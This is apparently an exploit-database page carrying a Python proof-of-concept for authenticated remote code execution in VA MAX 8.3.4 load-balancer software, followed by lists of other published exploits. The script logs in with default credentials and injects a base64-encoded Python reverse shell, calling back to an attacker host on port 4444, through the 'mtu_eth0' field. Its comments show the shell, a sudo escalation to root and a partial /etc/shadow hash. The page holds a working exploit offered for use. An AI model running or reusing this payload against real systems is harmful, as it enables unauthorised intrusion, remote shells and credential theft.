Search for hundreds of thousands of exploits

"VA MAX 8.3.4 - Authenticated Remote Code Execution"

Author

Exploit author

"Cody Sixteen"

Platform

Exploit platform

php

Release date

Exploit published date

2019-02-11

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
root@nippur:/home/c/src/nippur# cat vamax3.py
#!/usr/bin/env python
# quick poc for postauth rce bug in va max 8.3.4
#
# more:
#   https://code610.blogspot.com
#
# 10.02.2019
#

# p.s.
#
# listening on [any] 4444 ...
# 192.168.1.126: inverse host lookup failed: Unknown host
# connect to [192.168.1.160] from (UNKNOWN) [192.168.1.126] 58894
# sh: no job control in this shell
# sh-4.1$ id
# id
# uid=48(apache) gid=48(apache) groups=48(apache),10(wheel),18(dialout)
# sh-4.1$ cat /etc/shadow
# cat /etc/shadow
# cat: /etc/shadow: Permission denied
# sh-4.1$
# (...)
# sh-4.1$ sudo -l
# sudo -l
# Matching Defaults entries for apache on this host:
#     syslog_goodpri=debug, env_reset,
#     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
#
# User apache may run the following commands on this host:
#     (ALL) NOPASSWD: ALL
# sh-4.1$ sudo su
# sudo su
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
# head -n1 /etc/shadow
# root:$6$dNu030j/gSf.5(...)4IlAEGpzHv0:15392:0:99999:7:::
#
#
# o/

import datetime, time
import requests
from requests.auth import HTTPBasicAuth

# defines
dateTime = datetime.datetime.now()
timestamp = int(time.mktime(dateTime.timetuple()))

remote_host = 'http://192.168.1.126:9080'
our_user = 'loadbalancer'
our_passwd = 'loadbalancer'

# go
sess = requests.session()
logme = sess.post(remote_host, auth=HTTPBasicAuth(our_user, our_passwd))
logmeresp = logme.text


print '\n\tsmall poc for VA MAX 8.3.4\n'



# try to log in
if '<title>Load Balancer Administration System' in logmeresp:
  print '[+] using credentials: %s : %s' % ( our_user, our_passwd )
  print '[+] our timestamp: %s' % ( timestamp )

  print '[+] proceed.'

  getme = remote_host + '/lbadmin/config/changeip.php?action=modip&l=e&t=' + str(timestamp)
  dogetme = sess.get(getme, auth=HTTPBasicAuth(our_user, our_passwd))
  getmeresp = dogetme.text


  payload = "h4x;echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9J                                                                               TkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC4xLjE2MCIsNDQ0NCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3                                                                               MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk7Jwo=                                                                                | base64 -d | sh;#"

  #payload = "h4x;telnet 192.168.1.160 4444;#"
  #payload = ';id>/tmp/id.id.id'
  # print '[i] using payload:', payload

  data_req = {
    'eth0' : '192.168.1.126/24',
    'mtu_eth0' : '1500' + payload, # >.<
    'eth1' : '',
    'mtu_eth1' : '1500',
    'eth2' : '',
    'mtu_eth2' : '1500',
    'eth3' : '',
    'mtu_eth3' : '1500',
    'go' : 'Configure+Interfaces'
  }
  shLink = remote_host + '/lbadmin/config/changeip.php?action=modip&l=e&t=' + str(timestamp)
  shellWe = sess.post(shLink, data=data_req, auth=HTTPBasicAuth(our_user, our_passwd))
  shResp = shellWe.text

  # check sudo -l now :>
  print '\n\nThanks.Bye.\n'
Release DateTitleTypePlatformAuthor
2020-07-07"Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection"webappsphp"Mehmet Kelepçe"
2020-07-07"Sickbeard 0.1 - Remote Command Injection"webappshardwarebdrake
2020-07-07"Online Shopping Portal 3.1 - 'email' SQL Injection"webappsphpgh1mau
2020-07-07"BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation"webappsmultiple"William Summerhill"
2020-07-07"Microsoft Windows mshta.exe 2019 - XML External Entity Injection"remotexmlhyp3rlinx
2020-07-06"Grafana 7.0.1 - Denial of Service (PoC)"doslinuxmostwanted002
2020-07-06"Fire Web Server 0.1 - Remote Denial of Service (PoC)"doswindows"Saeed reza Zamanian"
2020-07-06"Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution"webappsphp"Basim Alabdullah"
2020-07-06"File Management System 1.1 - Persistent Cross-Site Scripting"webappsphpKeopssGroup0day_Inc
2020-07-06"RiteCMS 2.2.1 - Authenticated Remote Code Execution"webappsphp"Enes Özeser"
Release DateTitleTypePlatformAuthor
2020-07-07"Online Shopping Portal 3.1 - 'email' SQL Injection"webappsphpgh1mau
2020-07-07"Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection"webappsphp"Mehmet Kelepçe"
2020-07-06"RiteCMS 2.2.1 - Authenticated Remote Code Execution"webappsphp"Enes Özeser"
2020-07-06"File Management System 1.1 - Persistent Cross-Site Scripting"webappsphpKeopssGroup0day_Inc
2020-07-06"Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution"webappsphp"Basim Alabdullah"
2020-07-02"ZenTao Pro 8.8.2 - Command Injection"webappsphp"Daniel Monzón"
2020-07-01"PHP-Fusion 9.03.60 - PHP Object Injection"webappsphpcoiffeur
2020-07-01"Online Shopping Portal 3.1 - Authentication Bypass"webappsphp"Ümit Yalçın"
2020-07-01"e-learning Php Script 0.1.0 - 'search' SQL Injection"webappsphpKeopssGroup0day_Inc
2020-06-30"Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting"webappsphp"Anushree Priyadarshini"
Release DateTitleTypePlatformAuthor
2020-03-30"Zen Load Balancer 3.10.1 - Remote Code Execution"webappscgi"Cody Sixteen"
2019-02-11"VA MAX 8.3.4 - Authenticated Remote Code Execution"webappsphp"Cody Sixteen"
2017-11-07"ManageEngine Applications Manager 13 - SQL Injection"webappswindows"Cody Sixteen"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46348/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.